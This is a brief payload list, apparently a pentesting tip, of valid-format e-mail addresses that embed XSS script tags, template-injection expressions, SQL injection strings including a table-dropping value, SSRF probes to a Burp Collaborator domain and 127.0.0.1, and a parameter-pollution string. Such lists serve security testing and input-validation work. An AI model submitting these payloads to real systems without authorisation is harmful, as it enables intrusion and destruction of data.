valid e-mail addresses payload list of different bug classes: ✅

XSS (Cross-Site Scripting):
-> test+<script>alert(0)</script>@example.com
-> test@example<script>alert(0)</script>.com
-> "<script>alert(0)</script>"@example.com

Template injection:
-> "<%= 7 + 7 %>"@example.com
-> test+${{7*7}}@example.com

SQL injection:
-> "' OR 1=1 -- '"@example.com
-> "mail'); DROP TABLE users;--"@example.com

SSRF (Server-Side Request Forgery):
-> Tom.hardy@abc123.burpcollaborator.net
-> Tom.hardy@[127.0.0.1]

Parameter pollution:
-> victim&email=attacker@example.com
